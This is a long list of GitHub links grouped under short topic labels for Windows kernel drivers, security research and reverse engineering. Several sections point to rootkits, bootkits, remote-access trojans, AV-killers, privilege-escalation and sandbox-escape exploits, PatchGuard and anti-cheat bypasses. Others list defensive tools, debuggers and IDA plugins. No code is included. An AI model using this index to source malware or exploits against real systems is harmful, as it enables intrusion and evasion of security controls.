https://github.com/jjdredd/procsentinel (verify the address space of a process) https://github.com/SanseoLab/simpleAVdriver https://github.com/SanseoLab/ProcLogger https://github.com/notscimmy/libelevate https://github.com/ZhuHuiBeiShaDiao/ObRegisterCallBacksByPass https://github.com/Sqdwr/RemoveCallBacks https://github.com/JKornev/hidden https://github.com/binbibi/CallbackEx https://github.com/swwwolf/cbtest https://github.com/nmgwddj/Learn-Windows-Drivers https://github.com/SamLarenN/CallbackDisabler usb filter https://github.com/GoodstudyChina/USBlocker sfilter https://github.com/haidragon/sfilter minifilter https://github.com/lxt1045/FileLogger https://github.com/vitalikpi/FileWall https://github.com/Mermeze/System-Monitor https://github.com/cn505240/lightweight-reactive-snapshot-service https://github.com/aviadyifrah/NAGuard https://github.com/y0n0622/DriversCode https://github.com/NotSurprised/MiniLogger https://github.com/hidd3ncod3s/hipara https://github.com/NtRaiseHardError/Providence https://github.com/maaaaz/mimicertz https://github.com/MUmesha/SecureFile https://github.com/anystayisjk/WordEncrypt https://github.com/anystayisjk/EncryptEngine https://github.com/yedushusheng/FileEncryption https://github.com/JokerMars/engine https://github.com/icedxu/Monitor https://github.com/smartinm/diskcryptor (disk encrypt) https://github.com/hedgeh/SEWindows (HIPS) https://github.com/474172261/DataProtector https://github.com/CynicalApe/Minifilter-CSHARP-ConsoleApp https://github.com/NtRaiseHardError/Anti-Delete (File anti delete) https://github.com/Randomize163/FSDefender https://github.com/ETEFS/ETEFS_Mini https://github.com/gfleury/ProtegeDados_ProjetoFinal https://github.com/denisvieriu/Portable-Executable-Minifilter-Driver https://github.com/surajfale/passthrough-minifilter-driver https://github.com/louk78/Virgo https://github.com/tandasat/Scavenger https://github.com/dubeyprateek/HideFiles https://github.com/aleksk/LazyCopy https://github.com/guidoreina/minivers https://github.com/idkwim/mfd https://github.com/Coxious/Antinvader https://github.com/tandasat/Scavenger https://github.com/fishfly/X70FSD https://github.com/ExpLife/BKAV.Filter anti Ransomware https://github.com/clavis0x/AntiRansomware https://github.com/DecryptoniteTeam/Decryptonite https://github.com/ofercas/ransomware_begone virtual disk https://github.com/zhaozhongshu/winvblock_vs https://github.com/yogendersolanki91/Kernel-Driver-Example virtual file system https://github.com/ufrisk/MemProcFS (The Memory Process File System) https://github.com/TanninOne/usvfs https://github.com/ExpLife/CodeUMVFS https://github.com/yogendersolanki91/ProcessFileSystem https://github.com/BenjaminKim/dokanx lpc https://github.com/avalon1610/LPC alpc https://github.com/avalon1610/ALPC lsp/spi https://github.com/TinkerBravo/SPIRemove https://github.com/AnwarMohamed/Packetyzer afd https://github.com/xiaomagexiao/GameDll https://github.com/DeDf/afd https://github.com/a252293079/NProxy tdi https://github.com/wanttobeno/wmifilter https://github.com/xue-blood/adfilter https://github.com/alex9191/NetDriver (send & receive HTTP requests) https://github.com/alex9191/ZeroBank-ring0-bundle https://github.com/Sha0/winvblock https://github.com/michael4338/TDI https://github.com/cullengao/tdi_monitor https://github.com/uniking/TDI-Demo https://github.com/codereba/netmon wfp https://github.com/reinhardvz/enumwfp https://github.com/BOT-Man-JL/WFP-Traffic-Redirection-Driver https://github.com/henrypp/simplewall https://github.com/dfct/PortMapper (Port Map) https://github.com/TinkerBravo/WFPKit https://github.com/Arno0x/DivertTCPconn https://github.com/mullvad/libwfp https://github.com/gifur/NetworkMnt https://github.com/ss-abramchuk/OpenVPNAdapter/blob/f016614ed3dec30672e4f1821344b7992825a98d/OpenVPN Adapter/Vendors/openvpn/openvpn/tun/win/wfp.hpp https://github.com/itari/vapu https://github.com/basil00/Divert https://github.com/WPO-Foundation/win-shaper https://github.com/raymon-tian/WFPFirewall https://github.com/killbug2004/HashFilter https://github.com/henrypp/simplewall https://docs.microsoft.com/zh-cn/windows-hardware/drivers/network/porting-packet-processing-drivers-and-apps-to-wfp https://github.com/thecybermind/ipredir ndis https://github.com/pr0v3rbs/MalSiteBlocker https://github.com/Beamer-LB/netmap/tree/stable/WINDOWS https://github.com/ndemarinis/ovs/tree/22a1ba42f8137cd3532b54880b19b51d4b87440d/datapath-windows/ovsext https://github.com/markjandrews/CodeMachineCourse/tree/5473d4ea808791c2a048f2c8c9c86f011a6da5e8/source/kerrkt.labs/labs/NdisLwf https://github.com/openthread/openthread/tree/master/examples/drivers/windows https://github.com/Hartigan/Firewall https://github.com/zy520321/ndis-filter https://github.com/yuanmaomao/NDIS_Firewall https://github.com/SoftEtherVPN/Win10Pcap https://github.com/IsoGrid/NdisProtocol https://github.com/lcxl/lcxl-net-loader https://www.ntkernel.com/windows-packet-filter/ https://github.com/michael4338/NDIS https://github.com/IAmAnubhavSaini/ndislwf https://github.com/OpenVPN/tap-windows6 https://github.com/SageAxcess/pcap-ndis6 https://github.com/uniking/NDIS-Demo https://github.com/mkdym/NDISDriverInst https://github.com/debugfan/packetprot https://github.com/Iamgublin/NDIS6.30-NetMonitor https://github.com/nmap/npcap https://github.com/Ltangjian/FireWall https://github.com/Microsoft/Windows-driver-samples/tree/master/network/config/bindview https://github.com/brorica/http_inject (winpcap) wsk https://github.com/adrianyy/rw_socket_driver https://github.com/wbenny/KSOCKET https://github.com/xalley/WskHttp https://github.com/reinhardvz/wsk https://github.com/akayn/kbMon https://github.com/02strich/audionet https://github.com/mestefy/securityplus https://github.com/skycipher/CNGProvider rootkits https://github.com/Alex3434/wmi-static-spoofer https://github.com/KIDofot/BypassDriverDetection_And_Kill360Process https://github.com/longmode/UTKModule https://github.com/nkga/cheat-driver (read/write memory of arbitrary processes) https://github.com/lantaoxu/HWIDFaker (hwid fake) https://github.com/zerosum0x0/puppetstrings https://github.com/Synestraa/Highcall-Library (Highcall) https://github.com/Microwave89/drvtricks https://github.com/Psychotropos/xhunter1_privesc (XIGNCODE3) https://github.com/ionescu007/r0ak (RWE) https://github.com/cyberweapons/cyberweapons https://github.com/huoji120/AV-Killer https://github.com/Sqdwr/DeleteFile https://github.com/Sqdwr/DeleteFileByCreateIrp https://github.com/Mattiwatti/PPLKiller https://github.com/bfosterjr/ci_mod https://github.com/HoShiMin/EnjoyTheRing0 https://github.com/hfiref0x/ZeroAccess https://github.com/hackedteam/driver-win32 https://github.com/hackedteam/driver-win64 https://github.com/csurage/Rootkit https://github.com/bowlofstew/rootkit.com https://github.com/Nervous/GreenKit-Rootkit https://github.com/bytecode-77/r77-rootkit https://github.com/Cr4sh/WindowsRegistryRootkit https://github.com/Alifcccccc/Windows-Rootkits https://github.com/Schnocker/NoEye https://github.com/christian-roggia/open-myrtus https://github.com/Cr4sh/DrvHide-PoC https://github.com/mstefanowich/SquiddlyDiddly2 https://github.com/MalwareTech/FakeMBR https://github.com/Cr4sh/PTBypass-PoC https://github.com/psaneme/Kung-Fu-Malware https://github.com/hasherezade/persistence_demos https://github.com/MinhasKamal/TrojanCockroach https://github.com/akayn/kbMon mbr https://github.com/Cisco-Talos/MBRFilter bootkits https://github.com/DeviceObject/rk2017 https://github.com/DeviceObject/ChangeDiskSector https://github.com/DeviceObject/Uefi_HelloWorld https://github.com/DeviceObject/ShitDrv https://github.com/DeviceObject/DarkCloud https://github.com/nyx0/Rovnix https://github.com/MalwareTech/TinyXPB https://github.com/m0n0ph1/Win64-Rovnix-VBR-Bootkit https://github.com/NextSecurity/Gozi-MBR-rootkit https://github.com/NextSecurity/vector-edk https://github.com/ahixon/booty uefi/smm https://github.com/DeviceObject/Uefi_HelloWorld https://github.com/LongSoft/UEFITool https://github.com/dude719/UEFI-Bootkit https://github.com/quarkslab/dreamboot https://github.com/gyje/BIOS_Rootkit https://github.com/scumjr/the-sea-watcher https://github.com/zhuyue1314/stoned-UEFI-bootkit https://github.com/hackedteam/vector-edk https://github.com/Cr4sh/SmmBackdoor https://github.com/Cr4sh/PeiBackdoor https://github.com/Cr4sh/fwexpl bootloader https://github.com/apriorit/custom-bootloader smc https://github.com/marcusbotacin/Self-Modifying-Code anti debug https://github.com/atlantis2013/Evasion-Tools https://github.com/AlicanAkyol/sems https://github.com/strivexjun/XAntiDebug https://github.com/marcusbotacin/Anti.Analysis https://github.com/LordNoteworthy/al-khaser https://github.com/eschweiler/ProReversing crypters https://github.com/m0n0ph1/FileCrypter https://github.com/iGh0st/Crypters malware https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp (C#) https://github.com/zerosum0x0/koadic (JScript RAT) https://github.com/malwaredllc/bamf https://github.com/malwaredllc/byob (py) https://github.com/fereh/tacekit https://github.com/eset/malware-ioc https://github.com/lianglixin/RemoteControl-X3 https://github.com/Souhardya/UBoat (HTTP) https://github.com/malwares/Botnet https://github.com/RafaelGSS/HyzMall https://github.com/DeadNumbers/Pegasus https://github.com/mdsecactivebreach/SharpShooter https://github.com/mwsrc/XtremeRAT https://github.com/mwsrc/Schwarze-Sonne-RAT (delphi) https://github.com/Mr-Un1k0d3r/ThunderShell (powershell) https://github.com/DimChris0/LoRa https://github.com/marcusbotacin/Malware.Multicore https://github.com/bxlcity/malware https://github.com/grcasanova/SuperVirus https://github.com/hackedteam/core-win32 https://github.com/hackedteam/scout-win https://github.com/hackedteam/vector-dropper EternalBlue && Doublepulsar && Mine https://github.com/xmrig/xmrig https://github.com/TolgaSEZER/EternalPulse shellcode analysis https://github.com/OALabs/BlobRunner malware analysis https://github.com/Formyown/Alesense-Antivirus (nice demo) https://github.com/ctxis/capemon (Config And Payload Extraction) https://github.com/tdevuser/MalwFinder https://github.com/MalwareCantFly/Vba2Graph https://github.com/unexpectedBy/Automated-Malware-Analysis-List https://github.com/wchen-r7/amsiscanner (Microsoft's Antimalware Scan Interface) https://github.com/ctxis/capemon https://github.com/kevthehermit/RATDecoders https://github.com/marcusbotacin/Malware.Variants https://github.com/marcusbotacin/Hardware-Assisted-AV https://github.com/gentilkiwi/spectre_meltdown https://github.com/gentilkiwi/wanadecrypt https://github.com/bloomer1016 https://github.com/CHEF-KOCH/malware-research https://github.com/gentilkiwi/wanakiwi arktools https://github.com/basketwill/Sysmon_reverse https://github.com/ZhuHuiBeiShaDiao/KernelHooksDetection_x64 https://github.com/AxtMueller/Windows-Kernel-Explorer https://github.com/hedgeh/SEWindows (doc:hedgeh.github.io/startup.html) https://github.com/glmcdona/MALM https://github.com/ahmad-siavashi/Ana-Process-Explorer https://github.com/alex9191/KernelModeMonitor https://github.com/marcosd4h/memhunter https://github.com/gleeda/memtriage https://github.com/KernelMode/Process_Dop https://github.com/hm200958/kmdf--analyse https://github.com/AzureGreen/WinNT-Learning https://github.com/marcusbotacin/BranchMonitoringProject https://github.com/AzureGreen/ArkProtect https://github.com/AzureGreen/ArkToolDrv https://github.com/HollyDi/PCAssistant https://github.com/ChengChengCC/Ark-tools https://github.com/swatkat/arkitlib https://github.com/swwwolf/wdbgark https://github.com/zibility/Anti-Rootkits https://github.com/SLAUC91/AntiCheat https://github.com/sincoder/A-Protect https://github.com/apriorit/antirootkit-anti-splicer https://github.com/kedebug/ScDetective https://github.com/PKRoma/ProcessHacker https://github.com/AndreyBazhan/DbgExt https://github.com/comaeio/SwishDbgExt https://github.com/ExpLife/atomic-red-team https://github.com/shenghe/pcmanager https://github.com/lj1987new/guardlite https://github.com/hackshields/antivirus/ https://github.com/AntiRootkit/BDArkit bypass patchguard https://github.com/9176324/Shark https://github.com/hfiref0x/UPGDSED https://github.com/tandasat/PgResarch https://github.com/killvxk/DisableWin10PatchguardPoc https://github.com/tandasat/findpg https://github.com/zer0mem/HowToBoostPatchGuard https://bbs.pediy.com/thread-214582.htm bypass dse https://github.com/hfiref0x/TDL https://github.com/hfiref0x/DSEFix HackSysExtremeVulnerableDriver https://github.com/redogwu/windows_kernel_exploit https://github.com/mgeeky/HEVD_Kernel_Exploit https://www.fuzzysecurity.com/tutorials.html https://rootkits.xyz/blog/ https://github.com/hacksysteam/HackSysExtremeVulnerableDriver https://github.com/k0keoyo/HEVD-Double-Free-PoC https://github.com/k0keoyo/HEVD-Arbitrary-Overwrite-Exploit-Win10-rs3 https://github.com/tekwizz123/HEVD-Exploit-Solutions https://github.com/k0keoyo/try_exploit https://github.com/Cn33liz/HSEVD-VariousExploits https://github.com/Cn33liz/HSEVD-StackOverflow https://github.com/Cn33liz/HSEVD-StackOverflowX64 https://github.com/Cn33liz/HSEVD-StackCookieBypass https://github.com/Cn33liz/HSEVD-ArbitraryOverwriteGDI https://github.com/Cn33liz/HSEVD-StackOverflowGDI https://github.com/Cn33liz/HSEVD-ArbitraryOverwriteLowIL https://github.com/Cn33liz/HSEVD-ArbitraryOverwrite https://github.com/akayn/demos windows exploits https://github.com/admintony/svnExploit https://github.com/smgorelik/Windows-RCE-exploits https://github.com/WindowsExploits/Exploits https://github.com/codewhitesec/UnmarshalPwn https://github.com/shellphish/how2heap https://github.com/externalist/exploit_playground https://github.com/cervoise/Abuse-bash-for-windows windows kernel exploits https://github.com/saaramar/execve_exploit (WSL) https://github.com/siberas/CVE-2016-3309_Reloaded https://github.com/moccajoghurt/drvmap_secure https://github.com/fishstiqz/poolinfo https://github.com/cbayet/Exploit-CVE-2017-6008 https://github.com/cbayet/PoolSprayer (pool spray) https://github.com/DownWithUp/CVE-2018-15499 (race condition) https://github.com/SandboxEscaper/randomrepo (win10 LPE) https://github.com/jackson5-sec/TaskSchedLPE (LPE) https://github.com/HarsaroopDhillon/AHNLab-0day(LPE) https://github.com/paranoidninja/Pandoras-Box https://github.com/MarkHC/HandleMaster https://github.com/can1357/physical_mem_controller https://github.com/can1357/safe_capcom https://github.com/can1357/CVE-2018-8897 https://github.com/JeremyFetiveau/Exploits https://github.com/hfiref0x/Stryker https://github.com/swwwolf/obderef https://github.com/k0keoyo/CVE-2017-0038-EXP-C-JS https://github.com/cbayet/PoolSprayer https://github.com/k0keoyo/Vir.IT-explorer-Anti-Virus-Null-Pointer-Reference-PoC https://github.com/k0keoyo/Driver-Loaded-PoC https://github.com/k0keoyo/try_exploit https://github.com/k0keoyo/CVE-2015-2546-Exploit https://github.com/k0keoyo/Dark_Composition_case_study_Integer_Overflow https://github.com/tinysec/vulnerability https://github.com/akayn/demos https://github.com/abatchy17/WindowsExploits https://github.com/recodeking/WindowsExploitation https://github.com/GDSSecurity/Windows-Exploit-Suggester https://github.com/rwfpl/rewolf-pcausa-exploit https://github.com/ratty3697/HackSpy-Trojan-Exploit https://github.com/SecWiki/windows-kernel-exploits https://github.com/sensepost/ms16-098 https://github.com/shjalayeri/sysret https://github.com/sam-b/windows_kernel_resources https://github.com/sensepost/gdi-palettes-exp https://github.com/ExpLife/ByPassCfg https://github.com/Rootkitsmm/WinIo-Vidix https://github.com/andrewkabai/vulnwindrv https://github.com/mwrlabs/CVE-2016-7255 https://github.com/MarkHC/HandleMaster https://github.com/SamLarenN/CapcomDKOM https://github.com/zerosum0x0/puppetstrings https://github.com/zerosum0x0/ShellcodeDriver https://github.com/Rootkitsmm/WinIo-Vidix https://github.com/progmboy/kernel_vul_poc https://github.com/rwfpl/rewolf-msi-exploit https://github.com/rwfpl/rewolf-pcausa-exploit https://github.com/Rootkitsmm/Win10Pcap-Exploit https://github.com/Rootkitsmm/MS15-061 https://github.com/Rootkitsmm/cve-2016-0040 https://github.com/Rootkitsmm/CVEXX-XX https://github.com/sensepost/ms16-098 https://github.com/Trietptm-on-Security/bug-free-adventure https://github.com/sam-b/CVE-2014-4113 https://github.com/Rootkitsmm/OpenVpn-Pool-Overflow https://github.com/Rootkitsmm/UnThreatAVDriver-DOS https://github.com/Cr4sh/ThinkPwn https://github.com/hfiref0x/CVE-2015-1701 https://github.com/tyranid/windows-logical-eop-workshop https://github.com/google/sandbox-attacksurface-analysis-tools https://github.com/tyranid/ExploitRemotingService https://github.com/tyranid/DeviceGuardBypasses https://github.com/tyranid/ExploitDotNetDCOM https://github.com/hatRiot/token-priv(EOP) https://github.com/weizn11/MS17010_AllInOne https://github.com/TeskeVirtualSystem/MS17010Test LPE https://github.com/AlessandroZ/BeRoot https://github.com/HackerPide/The-Division-Bypass (division bypass) https://github.com/khr0x40sh/WhiteListEvasion https://github.com/ohpe/juicy-potato https://github.com/nmulasmajic/syscall_exploit_CVE-2018-8897 https://github.com/codewhitesec/UnmarshalPwn https://ohpe.github.io/juicy-potato/ office exploit https://github.com/rxwx/CVE-2017-8570 flash exploit https://github.com/brianwrf/CVE-2017-4878-Samples sandbox https://github.com/taiFansou/Proteibox sandbox escape https://github.com/xairy/vmware-exploitation https://github.com/649/Chrome-Sandbox-Exploit https://github.com/SilverMoonSecurity/SandboxEvasion https://github.com/exAphex/SandboxEscape https://github.com/Fel0ny/Sandbox-Detection https://github.com/CheckPointSW/InviZzzible https://github.com/MalwareTech/AppContainerSandbox https://github.com/tyranid/IE11SandboxEscapes https://github.com/649/Chrome-Sandbox-Exploit https://github.com/google/sandbox-attacksurface-analysis-tools https://github.com/conix-security/zer0m0n https://github.com/iceb0y/windows-container https://github.com/s7ephen/SandKit https://github.com/D4Vinci/Dr0p1t-Framework https://github.com/cryptolok/MorphAES https://github.com/mtalbi/vm_escape https://github.com/unamer/vmware_escape https://github.com/erezto/lua-sandbox-escape https://github.com/brownbelt/Edge-sandbox-escape https://github.com/shakenetwork/vmware_escape https://github.com/Cr4sh/prl_guest_to_host anti exploit https://github.com/shjalayeri/Pwnypot https://github.com/shjalayeri/MCEDP https://github.com/Empier/Anti-Exploit cve https://github.com/Ridter/acefile https://github.com/Ridter/Exchange2domain https://github.com/ze0r/cve-2018-8453-exp https://github.com/gravitational/cve-2018-1002105 https://github.com/LyleMi/dom-vuln-db https://github.com/renorobert/virtualbox-cve-2018-2844 https://github.com/LiuCan01/cve-list-pro https://github.com/CVEProject/cvelist hips https://github.com/godaddy/procfilter https://github.com/BrunoMCBraga/Kernel-Whisperer https://malwaretips.com/threads/av-self-protection-process-c-c.66200/ https://github.com/zareprj/JAV-AV-Engine https://github.com/0xdabbad00/OpenHIPS https://github.com/ExpLife/Norton_AntiVirus_SourceCode https://github.com/majian55555/MJAntiVirusEngine https://github.com/develbranch/TinyAntivirus https://github.com/tandasat/EopMon https://github.com/tandasat/MemoryMon windows hypervisor https://github.com/gamozolabs/falkervisor_grilled_cheese https://github.com/redogwu/hyper-v https://github.com/Ekrte/hithithit https://github.com/Microsoft/FirewallEventMonitor https://github.com/ionescu007/Simpleator https://github.com/StrikerX3/whvpclient kvm https://github.com/david942j/kvm-kernel-example vt https://github.com/udosteinberg/NOVA https://github.com/changeofpace/VivienneVMM (stealthy debugging framework) https://github.com/tklengyel/drakvuf https://github.com/gamozolabs/applepie https://github.com/haidragon/newbluepill https://github.com/Gbps/gbhv https://github.com/ionescu007/SimpleVisor https://github.com/xdel/bluepillstudy https://github.com/SinaKarvandi/Hypervisor-From-Scratch https://github.com/wbenny/hvpp https://github.com/Sqdwr/Multi_CPU_VtBase https://github.com/marche147/IoctlMon https://github.com/ionescu007/SimpleVisor https://github.com/zer0mem/MiniHyperVisorProject https://github.com/zer0mem/ShowMeYourGongFu https://github.com/zer0mem/HyperVisor https://github.com/marche147/SimpleVT https://github.com/DarthTon/HyperBone https://github.com/nick-kvmhv/splittlb https://github.com/zareprj/Vmx_Prj https://github.com/ZhuHuiBeiShaDiao/MiniVTx64 https://github.com/tandasat/HyperPlatform https://github.com/hzqst/Syscall-Monitor https://github.com/asamy/ksm https://github.com/in12hacker/VT_64_EPT https://github.com/ZhuHuiBeiShaDiao/PFHook https://github.com/tandasat/FU_Hypervisor https://github.com/tandasat/DdiMon https://github.com/tandasat/GuardMon https://github.com/yqsy/VT_demo https://github.com/OkazakiNagisa/VTbasedDebuggerWin7 https://github.com/Ouroboros/JuusanKoubou https://github.com/aaa1616/Hypervisor https://github.com/Nukem9/VirtualDbg https://github.com/Nukem9/VirtualDbgHide https://github.com/cheat-engine/cheat-engine https://github.com/Kelvinhack/kHypervisor firmware https://github.com/platomav/MEAnalyzer fuzzer https://github.com/mwrlabs/ViridianFuzzer https://github.com/GoSSIP-SJTU/TripleDoggy https://github.com/payatu/EMFFuzzer https://github.com/googleprojectzero/bochspwn-reloaded https://github.com/googleprojectzero/p0tools https://github.com/wnagzihxa1n/BrowserSecurity https://github.com/Dongdongshe/neuzz https://github.com/nickjackson2011/study-TTF_format https://github.com/oxagast/ansvif https://github.com/hfiref0x/ROCALL https://github.com/bin2415/fuzzing_paper https://github.com/CERTCC/dranzer (activex/com) https://github.com/lcatro/How-to-Read-Source-and-Fuzzing (learn fuzzer) https://github.com/sogeti-esec-lab/RPCForge https://github.com/RootUp/BFuzz https://github.com/necst/crave https://github.com/IOActive/FuzzNDIS https://github.com/bee13oy/AV_Kernel_Vulns/tree/master/Zer0Con2017 https://github.com/k0keoyo/kDriver-Fuzzer (Paper:https://whereisk0shl.top/post/2018-01-30) https://github.com/koutto/ioctlbf https://github.com/Cr4sh/ioctlfuzzer https://github.com/Cr4sh/MsFontsFuzz https://github.com/hfiref0x/NtCall64 https://github.com/Rootkitsmm/Win32k-Fuzzer https://github.com/mwrlabs/KernelFuzzer https://github.com/SignalSEC/kirlangic-ttf-fuzzer https://github.com/demi6od/Smashing_The_Browser https://github.com/marche147/IoctlMon https://github.com/k0keoyo/Some-Kernel-Fuzzing-Paper emet https://github.com/codingtest/EMET hotpatch https://github.com/codingtest/windows_hotpatch memory hack https://github.com/Empier/MemoryEditor game https://github.com/scarsty/kys-cpp game hack https://github.com/M-T3K/GameHacking https://github.com/nanoric/pkn https://github.com/luciouskami/APEX-EACBypass https://github.com/fenix01/cheatengine-library (cheatengine library wrapper) https://github.com/GoodstudyChina/CSGO-Cheat https://github.com/Nixer1337/Nixware-GMOD https://github.com/DragonQuestHero/PUBG-PAK-Hacker (BattlEye) https://github.com/GameHackingBook/GameHackingCode https://github.com/danielkrupinski/Osiris (Counter-Strike) https://github.com/moccajoghurt/MemWars https://github.com/dsasmblr/hacking-online-games https://github.com/dsasmblr/game-hacking https://github.com/daswareinfach/Battleye-VAC-EAC-Kernel-Bypass (BattlEye) https://blog.his.cat/a/fuck_battleye.cat (BattlEye) https://github.com/Tai7sy/BE_Fuck (Battleye) https://github.com/Synestraa/Highcall-Library https://github.com/cheat-engine/cheat-engine https://github.com/DreamHacks/dreamdota https://github.com/yoie/NGPlug-in https://github.com/DevelopKits/proj https://github.com/VideoCardGuy/ExpTool_GUI https://github.com/VideoCardGuy/Zhihu_SimpleLog https://github.com/VideoCardGuy/NewYuGiOh_CheatDLL_x64 https://github.com/VideoCardGuy/Tetris https://github.com/VideoCardGuy/YuGiOh https://github.com/VideoCardGuy/SnakeAI https://github.com/VideoCardGuy/gitAsktao https://github.com/VideoCardGuy/War3Cheat https://github.com/VideoCardGuy/AStar_Study https://github.com/VideoCardGuy/BnsChina_SetSpeed https://github.com/VideoCardGuy/LOLProjects https://github.com/VideoCardGuy/NewYuGiOh_CheatDLL_x64 https://github.com/VideoCardGuy/PictureMatchGame https://github.com/VideoCardGuy/AutoLoginByBnsChina https://github.com/VideoCardGuy/MemoryWatchTool https://github.com/VideoCardGuy/LOL_China https://github.com/mlghuskie/NoBastian https://github.com/G-E-N-E-S-I-S/BattlegroundsChams https://github.com/luciouskami/XignCode3Bypass https://github.com/luciouskami/CS-GO-Simple-Hack https://github.com/luciouskami/load-self-mix https://github.com/Karaulov/WarcraftIII_DLL_126-127 https://github.com/TonyZesto/PubgPrivXcode85 https://github.com/luciouskami/gameguard-for-war3 https://github.com/PopcornEgg/LOLChangeSkin https://github.com/ValveSoftware/ToGL https://github.com/Karaulov/War3-SizeLimit-Bypass https://github.com/F7eak/Xenon https://github.com/syj2010syj/All-Star-Battle-2 anti cheat https://github.com/GravitLauncher/Avanguard https://github.com/Mouka-Yang/AntiCheatProtector https://github.com/mq1n/NoMercy https://github.com/SagaanTheEpic/Sagaan-AntiCheat-V2.0 https://github.com/SagaanTheEpic/SAC-Sagaan-AntiCheat-Module- https://github.com/SagaanTheEpic/SAC-Anti-Debug https://github.com/SagaanTheEpic/SAC-Sagaan-AntiCheat-ModuleThread https://github.com/SagaanTheEpic/SAC-Sagaan-AntiCheat-OverlayDetector- https://github.com/SagaanTheEpic/Mega-Bypasss https://github.com/SagaanTheEpic/SAC-Sagaan-AntiCheat-UserMode- https://github.com/SagaanTheEpic/SAC-Sagaan-AntiCheat-Driver- https://github.com/SagaanTheEpic/SagaanTheEpic-Millin-Hack-SMH-Kernel https://github.com/SagaanTheEpic/LSASS-Usermode-Bypass https://github.com/SagaanTheEpic/KernelMode-Bypass https://github.com/chinatiny/GameAntiCheat https://github.com/jnastarot/anti-cheat https://github.com/jnastarot/ice9 software reverse https://github.com/stonedreamforest/re_avkmgr https://github.com/stonedreamforest/re_sysdiag pe protector https://github.com/devilogic/xvirus https://github.com/nickcano/RelocBonus https://github.com/jnastarot/furikuri unpacker https://github.com/Phat3/PINdemonium (pin) https://github.com/BromiumLabs/PackerAttacker http://n10info.blogspot.com/2018/03/xvolkolak-010.html emulate code execution https://github.com/hzqst/unicorn_pe https://github.com/inaz2/Unico https://github.com/Coldzer0/Cmulator pin https://github.com/BreakingMalware/Selfie https://github.com/BreakingMalware/AVulnerabilityChecker https://github.com/hasherezade/MyPinTools https://github.com/hasherezade/tiny_tracer https://github.com/dyninst/dyninst symbolic execution https://github.com/cea-sec/miasm https://github.com/illera88/Ponce https://github.com/gaasedelen/lighthouse obfuscation https://github.com/DoctorLai/VBScript_Obfuscator deobfuscation https://github.com/JonathanSalwan/Tigress_protection https://github.com/1111joe1111/tuts (vmprotect 3+) https://github.com/F8LEFT/DecLLVM https://github.com/mmyydd/relative-pattern https://github.com/SCUBSRGroup/OLLVM_Deobfuscation taint analyse https://github.com/cea-sec/miasm (blackhat 2018) https://bbs.pediy.com/thread-230299.htm https://bbs.pediy.com/thread-230105.htm https://bbs.pediy.com/thread-226603.htm https://bbs.pediy.com/thread-224353.htm https://bbs.pediy.com/thread-223849.htm https://github.com/airbus-seclab/bincat https://github.com/SCUBSRGroup/Taint-Analyse https://github.com/airbus-seclab/bincat https://github.com/SCUBSRGroup/Taint-Analyse https://github.com/piscou/FuzzWin bin diff https://github.com/joxeankoret/pigaios https://www.zynamics.com/bindiff.html https://github.com/joxeankoret/diaphora https://github.com/ExpLife/binarydiffer https://github.com/ExpLife/patchdiff2_ida6 https://github.com/ExpLife/patchdiff2 debugger https://github.com/marakew/syser x64dbg plugin https://github.com/changeofpace/Force-Page-Protection https://github.com/secrary/idenLib https://github.com/Gbps/x64dbg-consonance-theme https://github.com/ThunderCls/xAnalyzer https://github.com/mrexodia/TitanHide https://github.com/x64dbg/InterObfu https://github.com/x64dbg/ScyllaHide https://github.com/Nukem9/SwissArmyKnife https://github.com/x64dbg/x64dbg/wiki/Plugins live kernel debug https://samsclass.info/126/proj/p12-kernel-debug-win10.htm?tdsourcetag=s_pctim_aiomsg https://gds89.wordpress.com/2010/05/19/windows-7-x64-local-and-live-kernel-debugging/ windbg plugin http://www.andreybazhan.com/debugging.html https://github.com/vallejocc/Reverse-Engineering-Arsenal/ (anti-anti_debugging winDbg scripts) https://github.com/vagnerpilar/windbgtree (nice plugin) https://github.com/hugsy/windbg_js_scripts (js) https://github.com/0vercl0k/windbg-scripts (js) https://github.com/REhints/WinDbg https://github.com/jthuraisamy/DIRT https://github.com/OSRDrivers/penter https://github.com/OSRDrivers/windbg-exts https://github.com/panoramixor/GDIObjDump https://codeday.me/bug/20171003/80216.html http://virtualkd.sysprogs.org/ https://github.com/VincentSe/WatchTrees ida script & plugin https://github.com/google/binexport https://github.com/nihilus/ida-pro-swf https://github.com/ax330d/hrdev https://github.com/ax330d/ida_pdb_loader https://github.com/ax330d/functions-plus https://github.com/ecx86/classinformer-ida7 https://github.com/IOActive/kmdf_re https://github.com/a1ext/labeless https://github.com/kkHAIKE/tinyidb https://github.com/RolfRolles/HexRaysDeob (deobfuscate) https://github.com/icewall/BinDiffFilter https://github.com/devttys0/ida/ https://github.com/dude719/SigMaker-x64 (pat2sig) https://github.com/fireeye/flare-ida (idb2pat) https://zznop.github.io/bnida/ https://github.com/zyantific/IDASkins https://github.com/eugeii/ida-consonance https://github.com/mwrlabs/win_driver_plugin https://github.com/igogo-x86/HexRaysPyTools https://github.com/techbliss/Python_editor https://github.com/tmr232/Sark http://sark.readthedocs.io/en/latest/debugging.html https://bbs.pediy.com/thread-224627.htm (wing debugging idapython script) ida sig maker https://blog.csdn.net/lixiangminghate/article/details/81352205 idapython https://github.com/howmp/COMFinder https://github.com/maddiestone/IDAPythonEmbeddedToolkit https://github.com/zyantific/IDASkins https://github.com/ynvb/DIE https://github.com/nologic/idaref https://github.com/anatolikalysch/VMAttack https://github.com/36hours/idaemu https://github.com/gaasedelen/lighthouse https://github.com/avast-tl/retdec-idaplugin https://github.com/1111joe1111/ida_ea https://github.com/eugeii/ida-consonance https://github.com/IDArlingTeam/IDArling https://github.com/aaronportnoy/toolbag https://github.com/L4ys/LazyIDA https://github.com/push0ebp/sig-database https://github.com/igogo-x86/HexRaysPyTools https://github.com/intezer/docker-ida https://github.com/keystone-engine/keypatch https://github.com/dzzie/IDACompare https://github.com/snare/ida-efiutils https://github.com/zachriggle/ida-splode https://github.com/nccgroup/idahunt https://github.com/iphelix/ida-sploiter https://github.com/ALSchwalm/dwarfexport https://github.com/Maktm/FLIRTDB https://github.com/strazzere/golang_loader_assist https://github.com/Ga-ryo/IDAFuzzy https://github.com/duo-labs/idapython https://github.com/polymorf/findcrypt-yara https://github.com/patois/IDACyber https://github.com/F8LEFT/DecLLVM https://github.com/RobinDavid/idasec https://github.com/tboox/vm86 https://github.com/siberas/IDA2Sym https://github.com/sibears/IDAGolangHelper https://github.com/tmr232/IDABuddy https://github.com/zyantific/REtypedef https://github.com/nihilus/IDA_Signsrch https://github.com/ax330d/ida_pdb_loader https://github.com/alexander-hanel/idapython6to7 https://github.com/nektra/vtbl-ida-pro-plugin 